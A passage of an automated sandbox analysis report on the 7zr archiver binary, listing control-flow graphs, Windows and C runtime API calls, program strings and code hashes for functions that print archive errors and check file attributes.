b08247-b08271 call b084a7 call ad965d SysFreeString 834->839 836 b082ae 835->836 836->828 838->836 839->830 839->831
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B08017
                                                          • fputs.MSVCRT ref: 00B0804D
                                                            • Part of subcall function 00B08341: __EH_prolog.LIBCMT ref: 00B08346
                                                            • Part of subcall function 00B08341: fputs.MSVCRT ref: 00B0835B
                                                            • Part of subcall function 00B08341: fputs.MSVCRT ref: 00B08364
                                                          • fputs.MSVCRT ref: 00B0807A
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                            • Part of subcall function 00AD965D: VariantClear.OLEAUT32(?), ref: 00AD967F
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00B081AA
                                                          • fputs.MSVCRT ref: 00B081CD
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00B08267
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00B082B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                                          • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                                          • API String ID: 2889736305-3797937567
                                                          • Opcode ID: d0ef77f9fb65e83c1113da98f9a70b12ed0794adcf15b936b2550d32c3749d05
                                                          • Instruction ID: 719fc0bb5396367825d027a730c157fb6c1eeddd50184439989ee22c1413ec32
                                                          • Opcode Fuzzy Hash: d0ef77f9fb65e83c1113da98f9a70b12ed0794adcf15b936b2550d32c3749d05
                                                          • Instruction Fuzzy Hash: 12915A31A00605EFDB14DFA4D981AAEBBF5FF58310F2041ADE496A7291DF70AE45CB60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 846 b06766-b06792 call b6fb10 EnterCriticalSection 849 b06794-b06799 call b0c7d7 846->849 850 b067af-b067b7 846->850 854 b0679e-b067ac 849->854 852 b067b9 call ad1f91 850->852 853 b067be-b067c3 850->853 852->853 856 b06892-b068a8 853->856 857 b067c9-b067d5 853->857 854->850 860 b06941 856->860 861 b068ae-b068b4 856->861 858 b06817-b0682f 857->858 859 b067d7-b067dd 857->859 864 b06831-b06842 call ad1fa0 858->864 865 b06873-b0687b 858->865 859->858 862 b067df-b067eb 859->862 866 b06943-b0695a 860->866 861->860 863 b068ba-b068c2 861->863 867 b067f3-b06801 862->867 868 b067ed 862->868 869 b06933-b0693f call b0c5cd 863->869 870 b068c4-b068e6 call ad1fa0 fputs 863->870 864->865 883 b06844-b0686c fputs call ad2201 864->883 865->869 872 b06881-b06887 865->872 867->865 874 b06803-b06815 fputs 867->874 868->867 869->866 885 b068e8-b068f9 fputs 870->885 886 b068fb-b06917 call ae4f2a call ad1fb3 call ad1e40 870->886 872->869 873 b0688d 872->873 879 b0692e call ad1f91 873->879 880 b0686e call ad1fa0 874->880 879->869 880->865 883->880 889 b0691c-b06928 call ad1fa0 885->889 886->889 889->879
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B0676B
                                                          • EnterCriticalSection.KERNEL32(00B92938), ref: 00B06781
                                                          • fputs.MSVCRT ref: 00B0680B
                                                          • LeaveCriticalSection.KERNEL32(00B92938), ref: 00B06944
                                                            • Part of subcall function 00B0C7D7: fputs.MSVCRT ref: 00B0C840
                                                          • fputs.MSVCRT ref: 00B06851
                                                            • Part of subcall function 00AD2201: fputs.MSVCRT ref: 00AD221E
                                                          • fputs.MSVCRT ref: 00B068D9
                                                          • fputs.MSVCRT ref: 00B068F6
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                                          • String ID: v$Sub items Errors:
                                                          • API String ID: 2670240366-2468115448
                                                          • Opcode ID: f6772b461a84cc05c0dda135810a5b38ed40f96127994d307956908e2dab1d1c
                                                          • Instruction ID: 6eae1a26258134290e0d32c19efa8a8d67e842336d78c25f77e579046d7363f7
                                                          • Opcode Fuzzy Hash: f6772b461a84cc05c0dda135810a5b38ed40f96127994d307956908e2dab1d1c
                                                          • Instruction Fuzzy Hash: BB51AD31500700DFCB249F64D994AEABBF2FF88310F5484AEE19B876A1DB306C94CB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 898 b06359-b06373 call b6fb10 901 b06375-b06385 call b0c7d7 898->901 902 b0639e-b063af call b05a4d 898->902 901->902 907 b06387-b0639b 901->907 908 b063b5-b063cd 902->908 909 b065ee-b065f1 902->909 907->902 912 b063d2-b063d4 908->912 913 b063cf 908->913 910 b065f3-b065fb 909->910 911 b06624-b0663c 909->911 916 b06601-b06607 call b08012 910->916 917 b066ea call b0c5cd 910->917 918 b06643-b0664b 911->918 919 b0663e call ad1f91 911->919 914 b063d6-b063d9 912->914 915 b063df-b063e7 912->915 913->912 914->915 921 b064b1-b064bc call b06700 914->921 922 b06411-b06413 915->922 923 b063e9-b063f2 call ad1fa0 915->923 932 b0660c-b0660e 916->932 929 b066ef-b066fd 917->929 918->917 924 b06651-b0668f fputs call ad211a call ad1fa0 call b08685 918->924 919->918 949 b064c7-b064cf 921->949 950 b064be-b064c1 921->950 930 b06442-b06446 922->930 931 b06415-b0641d 922->931 923->922 944 b063f4-b0640c call ad210c call ad1fa0 923->944 924->929 983 b06691-b06697 924->983 940 b06497-b0649f 930->940 941 b06448-b06450 930->941 936 b0642a-b0643b 931->936 937 b0641f-b06425 call b06134 931->937 932->929 938 b06614-b0661f call ad1fa0 932->938 936->930 937->936 938->917 940->921 946 b064a1-b064ac call ad1fa0 call ad1f91 940->946 942 b06452-b0647a fputs call ad1fa0 call ad1fb3 call ad1fa0 941->942 943 b0647f-b06490 941->943 942->943 943->940 944->922 946->921 953 b064d1-b064da call ad1fa0 949->953 954 b064f9-b064fb 949->954 950->949 951 b065a2-b065a6 950->951 966 b065a8-b065b6 951->966 967 b065da-b065e6 951->967 953->954 981 b064dc-b064f4 call ad210c call ad1fa0 953->981 963 b0652a-b0652e 954->963 964 b064fd-b06505 954->964 976 b06530-b06538 963->976 977 b0657f-b06587 963->977 973 b06512-b06523 964->973 974 b06507-b0650d call b06134 964->974 978 b065d3 966->978 979 b065b8-b065ca call b06244 966->979 967->908 970 b065ec 967->970 970->909 973->963 974->973 985 b06567-b06578 976->985 986 b0653a-b06562 fputs call ad1fa0 call ad1fb3 call ad1fa0 976->986 977->951 982 b06589-b06595 call ad1fa0 977->982 978->967 979->978 996 b065cc-b065ce call ad1f91 979->996 981->954 982->951 1005 b06597-b0659d call ad1f91 982->1005 993 b06699-b0669f 983->993 994 b066df-b066e5 call ad1f91 983->994 985->977 986->985 1000 b066a1-b066b1 fputs 993->1000 1001 b066b3-b066ce call ae4f2a call ad1fb3 call ad1e40 993->1001 994->917 996->978 1006 b066d3-b066da call ad1fa0 1000->1006 1001->1006 1005->951 1006->994
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B0635E
                                                          • fputs.MSVCRT ref: 00B0645F
                                                            • Part of subcall function 00B0C7D7: fputs.MSVCRT ref: 00B0C840
                                                          • fputs.MSVCRT ref: 00B06547
                                                          • fputs.MSVCRT ref: 00B0665F
                                                          • fputs.MSVCRT ref: 00B066AE
                                                            • Part of subcall function 00AD1F91: fflush.MSVCRT ref: 00AD1F93
                                                            • Part of subcall function 00AD1FB3: __EH_prolog.LIBCMT ref: 00AD1FB8
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$H_prolog$fflushfree
                                                          • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                                          • API String ID: 1750297421-1898165966
                                                          • Opcode ID: 78fb52ce796036b987e65d8d1bd7639741119a64360aa0a16cd584681d8ee64b
                                                          • Instruction ID: b1ed07246ef7489e49a2710d81ab2862389a319cf6dd882e781ef5e42aca1fd0
                                                          • Opcode Fuzzy Hash: 78fb52ce796036b987e65d8d1bd7639741119a64360aa0a16cd584681d8ee64b
                                                          • Instruction Fuzzy Hash: B4B14B306017059FDB28EF64CAA1BAABBE1FF48304F0485AEE55B57392CB70AD54CB51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1565 ad6c72-ad6c8e call b6fb10 1568 ad6c96-ad6c9e 1565->1568 1569 ad6c90-ad6c94 1565->1569 1570 ad6ca6-ad6cae 1568->1570 1571 ad6ca0-ad6ca4 1568->1571 1569->1568 1572 ad6cd3-ad6cdc call ad8664 1569->1572 1570->1572 1573 ad6cb0-ad6cb5 1570->1573 1571->1570 1571->1572 1578 ad6d87-ad6d92 call ad88c6 1572->1578 1579 ad6ce2-ad6d02 call ad67f0 call ad2f88 call ad87df 1572->1579 1573->1572 1575 ad6cb7-ad6cce call ad67f0 call ad2f88 1573->1575 1591 ad715d-ad715f 1575->1591 1586 ad6f4c-ad6f62 call ad87fa 1578->1586 1587 ad6d98-ad6d9e 1578->1587 1602 ad6d4a-ad6d61 call ad7b41 1579->1602 1603 ad6d04-ad6d09 1579->1603 1600 ad6f64-ad6f66 1586->1600 1601 ad6f67-ad6f74 call ad85e2 1586->1601 1587->1586 1590 ad6da4-ad6dc7 call ad2e47 * 2 1587->1590 1614 ad6dc9-ad6dcf 1590->1614 1615 ad6dd4-ad6dda 1590->1615 1595 ad7118-ad7126 1591->1595 1600->1601 1610 ad6f76-ad6f7c 1601->1610 1611 ad6fd1-ad6fd8 1601->1611 1618 ad6d67-ad6d6b 1602->1618 1619 ad6d63-ad6d65 1602->1619 1603->1602 1606 ad6d0b-ad6d38 call ad9252 1603->1606 1606->1602 1629 ad6d3a-ad6d45 1606->1629 1610->1611 1616 ad6f7e-ad6f8a call ad6bf5 1610->1616 1622 ad6fda-ad6fde 1611->1622 1623 ad6fe4-ad6feb 1611->1623 1614->1615 1620 ad6ddc-ad6def call ad2407 1615->1620 1621 ad6df1-ad6df9 call ad3221 1615->1621 1625 ad70e5-ad70ea call ad6868 1616->1625 1644 ad6f90-ad6f93 1616->1644 1631 ad6d6d-ad6d75 1618->1631 1632 ad6d78 1618->1632 1630 ad6d7a-ad6d82 call ad764c 1619->1630 1620->1621 1634 ad6dfe-ad6e0b call ad87df 1620->1634 1621->1634 1622->1623 1622->1625 1626 ad701d-ad7024 call ad8782 1623->1626 1627 ad6fed-ad6ff7 call ad6bf5 1623->1627 1646 ad70ef-ad70f3 1625->1646 1626->1625 1651 ad702a-ad7035 1626->1651 1627->1625 1649 ad6ffd-ad7000 1627->1649 1629->1591 1647 ad7116 1630->1647 1631->1632 1632->1630 1655 ad6e0d-ad6e10 1634->1655 1656 ad6e43-ad6e50 call ad6c72 1634->1656 1644->1625 1650 ad6f99-ad6fb6 call ad67f0 call ad2f88 1644->1650 1652 ad710c 1646->1652 1653 ad70f5-ad70f7 1646->1653 1647->1595 1649->1625 1657 ad7006-ad701b call ad67f0 1649->1657 1686 ad6fb8-ad6fbd 1650->1686 1687 ad6fc2-ad6fc5 call ad717b 1650->1687 1651->1625 1659 ad703b-ad7044 call ad8578 1651->1659 1654 ad710e-ad7111 call ad6848 1652->1654 1653->1652 1660 ad70f9-ad7102 1653->1660 1654->1647 1662 ad6e1e-ad6e36 call ad67f0 1655->1662 1663 ad6e12-ad6e15 1655->1663 1676 ad6f3a-ad6f4b call ad1e40 * 2 1656->1676 1677 ad6e56 1656->1677 1678 ad6fca-ad6fcc 1657->1678 1659->1625 1681 ad704a-ad7054 call ad717b 1659->1681 1660->1652 1668 ad7104-ad7107 call ad717b 1660->1668 1683 ad6e58-ad6e7e call ad2f1c call ad2e04 1662->1683 1685 ad6e38-ad6e41 call ad2fec 1662->1685 1663->1656 1669 ad6e17-ad6e1c 1663->1669 1668->1652 1669->1656 1669->1662 1676->1586 1677->1683 1678->1654 1693 ad7064-ad7097 call ad2e47 call ad1089 * 2 call ad6868 1681->1693 1694 ad7056-ad705f call ad2f88 1681->1694 1703 ad6e83-ad6e99 call ad6bb5 1683->1703 1685->1683 1686->1687 1687->1678 1727 ad70bf-ad70cc call ad6bf5 1693->1727 1728 ad7099-ad70af wcscmp 1693->1728 1705 ad7155-ad7158 call ad6848 1694->1705 1711 ad6ecf-ad6ed1 1703->1711 1712 ad6e9b-ad6e9f 1703->1712 1705->1591 1714 ad6f09-ad6f35 call ad1e40 * 2 call ad6848 call ad1e40 * 2 1711->1714 1715 ad6ec7-ad6ec9 SetLastError 1712->1715 1716 ad6ea1-ad6eae call ad22bf 1712->1716 1714->1647 1715->1711 1725 ad6eb0-ad6ec5 call ad1e40 call ad2e04 1716->1725 1726 ad6ed3-ad6ed9 1716->1726 1725->1703 1730 ad6eec-ad6f07 call ad31e5 1726->1730 1731 ad6edb-ad6ee0 1726->1731 1742 ad70ce-ad70d1 1727->1742 1743 ad7129-ad7133 call ad67f0 1727->1743 1734 ad70bb 1728->1734 1735 ad70b1-ad70b6 1728->1735 1730->1714 1731->1730 1738 ad6ee2-ad6ee8 1731->1738 1734->1727 1736 ad7147-ad7154 call ad2f88 call ad1e40 1735->1736 1736->1705 1738->1730 1750 ad70d8-ad70e4 call ad1e40 1742->1750 1751 ad70d3-ad70d6 1742->1751 1760 ad713a 1743->1760 1761 ad7135-ad7138 1743->1761 1750->1625 1751->1743 1751->1750 1764 ad7141-ad7144 1760->1764 1761->1764 1764->1736
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AD6C77
                                                          • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00AD6EC9
                                                            • Part of subcall function 00AD6C72: wcscmp.MSVCRT ref: 00AD70A5
                                                            • Part of subcall function 00AD6BF5: __EH_prolog.LIBCMT ref: 00AD6BFA
                                                            • Part of subcall function 00AD6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00AD6C1A
                                                            • Part of subcall function 00AD6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00AD6C49
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                                          • String ID: :$DATA
                                                          • API String ID: 3316598575-2587938151
                                                          • Opcode ID: 5d6b4da339f230c170d2032e33dc790f506c20da569cc6789a74ff55674092e8
                                                          • Instruction ID: 88e74acacaba85d44c8bdd9fe596530dc008112f9c54e009b1aeb5cf4594ac62
                                                          • Opcode Fuzzy Hash: 5d6b4da339f230c170d2032e33dc790f506c20da569cc6789a74ff55674092e8
                                                          • Instruction Fuzzy Hash: 30E115309006099ACF25EFA4C985BEEB7B1BF14314F10461FE847673E2EB70A949CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$H_prolog
                                                          • String ID: =
                                                          • API String ID: 2614055831-2525689732
                                                          • Opcode ID: 05a366d0a24486625a7e21687c5a1db604f8c39a05c3cf8e4f7d44d2e06b2837
                                                          • Instruction ID: f90d763f407bdc993ca4f853939cf6246929aa77277daa7d4c1802a84c8d0014
                                                          • Opcode Fuzzy Hash: 05a366d0a24486625a7e21687c5a1db604f8c39a05c3cf8e4f7d44d2e06b2837
                                                          • Instruction Fuzzy Hash: AC214D32904118AECF05EB94DE52BEDBBB5EF58310F20406BE406722A1DF716E55CB91
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B08346
                                                          • fputs.MSVCRT ref: 00B0835B
                                                          • fputs.MSVCRT ref: 00B08364
                                                            • Part of subcall function 00B083BF: __EH_prolog.LIBCMT ref: 00B083C4
                                                            • Part of subcall function 00B083BF: fputs.MSVCRT ref: 00B08401
                                                            • Part of subcall function 00B083BF: fputs.MSVCRT ref: 00B08437
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$H_prolog
                                                          • String ID: =
                                                          • API String ID: 2614055831-2525689732
                                                          • Opcode ID: ba33ae3db08f48929e1ff66943dd46b03bb206c24e22ccc8d0c69a61d76ac093
                                                          • Instruction ID: 460ccb8c83160b7dd65090b79dfd5440c2b12f54d43a54fa578b8be37dc264f7
                                                          • Opcode Fuzzy Hash: ba33ae3db08f48929e1ff66943dd46b03bb206c24e22ccc8d0c69a61d76ac093
                                                          • Instruction Fuzzy Hash: 79018631A00004AFCB15BBA4D952BEDBFB5EF84750F00806BF446522A1CF744A56DBD5
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AF209B
                                                            • Part of subcall function 00AD757D: GetLastError.KERNEL32(00ADD14C), ref: 00AD757D
                                                            • Part of subcall function 00AF2C6C: __EH_prolog.LIBCMT ref: 00AF2C71
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ErrorLastfree
                                                          • String ID: Cannot find archive file$The item is a directory
                                                          • API String ID: 683690243-1569138187
                                                          • Opcode ID: 7781031eca58ea0bb706f0ac69d5ee78c5baef7b1e445e594c5f76f7a643e2ed
                                                          • Instruction ID: f5c5163fc6181d98a51830fcc086297d06f202f18250ccf18d6e5255e375fa33
                                                          • Opcode Fuzzy Hash: 7781031eca58ea0bb706f0ac69d5ee78c5baef7b1e445e594c5f76f7a643e2ed
                                                          • Instruction Fuzzy Hash: 4F723670D00258DFCB25DFA8C984BEDBBB5AF59300F14409AE959AB352CB709E81CF91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: CountTickfputs
                                                          • String ID: .
                                                          • API String ID: 290905099-4150638102
                                                          • Opcode ID: 0dbd41eea64bbd9a857c363635c2332dccedf2cfe3246f1825e1e056f03ec16d
                                                          • Instruction ID: 53afb176cc76b6c8b0b3e9d98d52385fb39e6fd37da56f181e2f7fbf4ba324cd
                                                          • Opcode Fuzzy Hash: 0dbd41eea64bbd9a857c363635c2332dccedf2cfe3246f1825e1e056f03ec16d
                                                          • Instruction Fuzzy Hash: 68713830600B049FCB25EF68C591BAEBBF6EF91300F504A9EE49797A91DB70B945CB11
                                                          APIs
                                                            • Part of subcall function 00AD9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00AD9CB3
                                                            • Part of subcall function 00AD9C8F: GetProcAddress.KERNEL32(00000000), ref: 00AD9CBA
                                                            • Part of subcall function 00AD9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00AD9CC8
                                                          • __aulldiv.LIBCMT ref: 00B1093F
                                                          • __aulldiv.LIBCMT ref: 00B1094B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                                          • String ID: 3333
                                                          • API String ID: 3520896023-2924271548
                                                          • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                                          • Instruction ID: b0367ce36516344b88f39d0e1130235a4f7277c5d307743b45ec8ce8b9638c08
                                                          • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                                          • Instruction Fuzzy Hash: C521BAB0900704AFE730EF699881A6BBAF9EB84750F40896EB186D7241D670A9808B55
                                                          APIs
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          • memset.MSVCRT ref: 00AFAEBA
                                                          • memset.MSVCRT ref: 00AFAECD
                                                            • Part of subcall function 00B104D2: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00B104F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: memset$ExceptionThrowfree
                                                          • String ID: Split
                                                          • API String ID: 1404239998-1882502421
                                                          • Opcode ID: a5d0ed6f3831de185969f1c10454b64e279d596181c702c7b6cd6644e6fcf085
                                                          • Instruction ID: 3e505a36a53767198e85405ad68ce9e14830f40b38be9c48883faf5d53c16a46
                                                          • Opcode Fuzzy Hash: a5d0ed6f3831de185969f1c10454b64e279d596181c702c7b6cd6644e6fcf085
                                                          • Instruction Fuzzy Hash: 144249B0A0024DDFDF25DBE4C984BFDBBB1AF25304F1440A9E649A7251CB71AE85CB52
                                                          APIs
                                                          • fputs.MSVCRT ref: 00B08437
                                                          • fputs.MSVCRT ref: 00B08401
                                                            • Part of subcall function 00AD1FB3: __EH_prolog.LIBCMT ref: 00AD1FB8
                                                          • __EH_prolog.LIBCMT ref: 00B083C4
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prologfputs$fputc
                                                          • String ID:
                                                          • API String ID: 678540050-0
                                                          • Opcode ID: 25c84d0bf819771f06e4f910dd84f3a1044038e5000f22ab6d7709cd4ba842f0
                                                          • Instruction ID: 574994b005ef33a3e0ad67c8df6fcb3307222d0b3c1ed9a63b1a1b1f6b2aa3dd
                                                          • Opcode Fuzzy Hash: 25c84d0bf819771f06e4f910dd84f3a1044038e5000f22ab6d7709cd4ba842f0
                                                          • Instruction Fuzzy Hash: 8A117031A04115ABCB09BBA0DA13AAEBFA6EF84750F40006BF503A23D1DF655A41CAD4
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AF2CE0
                                                            • Part of subcall function 00AD5E10: __EH_prolog.LIBCMT ref: 00AD5E15
                                                            • Part of subcall function 00AE41EC: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00AE421A
                                                            • Part of subcall function 00AD965D: VariantClear.OLEAUT32(?), ref: 00AD967F
                                                          Strings
                                                          • Cannot create output directory, xrefs: 00AF3070
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
